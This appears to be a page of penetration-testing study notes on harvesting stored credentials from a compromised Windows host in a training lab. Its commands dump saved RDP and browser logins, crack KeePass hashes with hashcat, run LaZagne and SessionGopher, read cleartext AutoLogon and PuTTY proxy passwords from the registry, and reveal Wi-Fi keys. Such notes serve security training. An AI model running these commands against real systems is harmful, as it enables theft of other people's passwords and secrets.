Further Credentials Theft

We will list some advanced methods to recover credentials:

Cmdkey Saved Credentials

The cmdkey command can be used to create, list, and delete stored usernames and passwords

To see if some credentiasls have been saved:

> cmdkey /list

    Target: LegacyGeneric:target=TERMSRV/SQL01
    Type: Generic
    User: inlanefreight\bob

We can't read the password but when we attempt to RDP to the target SQL01 the saved credentials will be used:

We can also use runas:

runas /savecred /user:inlanefreight\bob "COMMAND HERE"

Web Browser Credentials

Retrieve cookies & login forms from Google Chrome:

.\SharpChrome.exe logins /unprotect

KeePass Password Manager

KeePass is a password manager stored locally on the host. The database file ends with .kdbx

We can:

Transfer the .kdbx to our attacking machine
Use a tool such as keepass2john to extract the password hash
Crack the password with Hashcat or John the Ripper

Extract the hash

python2.7 keepass2john.py ILFREIGHT_Help_Desk.kdbx

Crack the hash

hashcat -m 13400 keepass_hash /~/Wordlists/rockyou.txt

Microsoft Exchange E-Mails

We use the tool MailSniper to look for credentials in microsoft exchange e-mails.

Lazagne.exe

LaZagne looks for credentials in various places:

> .\lazagne.exe -h

...
    chats               Run chats module
    mails               Run mails module
    all                 Run all modules
    git                 Run git module
    svn                 Run svn module
    windows             Run windows module
    wifi                Run wifi module
    maven               Run maven module
    sysadmin            Run sysadmin module
    browsers            Run browsers module
    games               Run games module
    multimedia          Run multimedia module
    memory              Run memory module
    databases           Run databases module
    php                 Run php module
...

To run a full search with all modules:

.\lazagne.exe all

Session Gopher

We can use SessionGopher to extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials.

> Import-Module .\SessionGopher.ps1
 
> Invoke-SessionGopher -Target <HOSTNAME>

Clear-Text Passwords in Registry

Certain programs and windows configurations can result in clear-text passwords or other data being stored in the registry.

Windows AutoLogon

Windows Autologon is used to configure their Windows operating system to automatically log on to a specific user account without requiring manual input of credentials.

The username and passwords are stored in clear in the registry at:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

It has 3 values usually:

AdminAutoLogon - "0" for off "1" for on
DefaultUserName
DefaultPassword

We read the values with:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Instead it is recommend to use Autologon.exe from the Sysinternals suite, which will encrypt the password as an LSA secret.

Putty

For Putty sessions utilizing a proxy connection, when the session is saved, the credentials of the proxy are stored in the registry in clear text.

Registry key access is tied to the user who saved the PuTTY session; it's in HKEY_CURRENT_USER. With admin privileges, you can find it in the corresponding user's hive in HKEY_USERS.

First we enum the sessions:

> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh

We can check the credentials of the session we found:

> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh

HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
    Present    REG_DWORD    0x1
    HostName    REG_SZ
    LogFileName    REG_SZ    putty.log
    
  <SNIP>
  
    ProxyDNS    REG_DWORD    0x1
    ProxyLocalhost    REG_DWORD    0x0
    ProxyMethod    REG_DWORD    0x5
    ProxyHost    REG_SZ    proxy
    ProxyPort    REG_DWORD    0x50
    ProxyUsername    REG_SZ    administrator
    ProxyPassword    REG_SZ    1_4m_th3_@cademy_4dm1n!

Wifi Passwords

List wifi connected to recently:

netsh wlan show profile

Depending on the network configuration, we can retrieve the pre-shared key (Key Content below) and potentially access the target network:

netsh wlan show profile <WIFI-NAME> key=clear

PreviousCredentials Hunting Next5 - Additional Techniques

Last updated 2 years ago

hashtagCmdkey Saved Credentials

hashtagWeb Browser Credentials

hashtagKeePass Password Manager

hashtagExtract the hash

hashtagCrack the hash

hashtagMicrosoft Exchange E-Mails

hashtagLazagne.exe

hashtagSession Gopher

hashtagClear-Text Passwords in Registry

hashtagWindows AutoLogon

hashtagPutty

hashtagWifi Passwords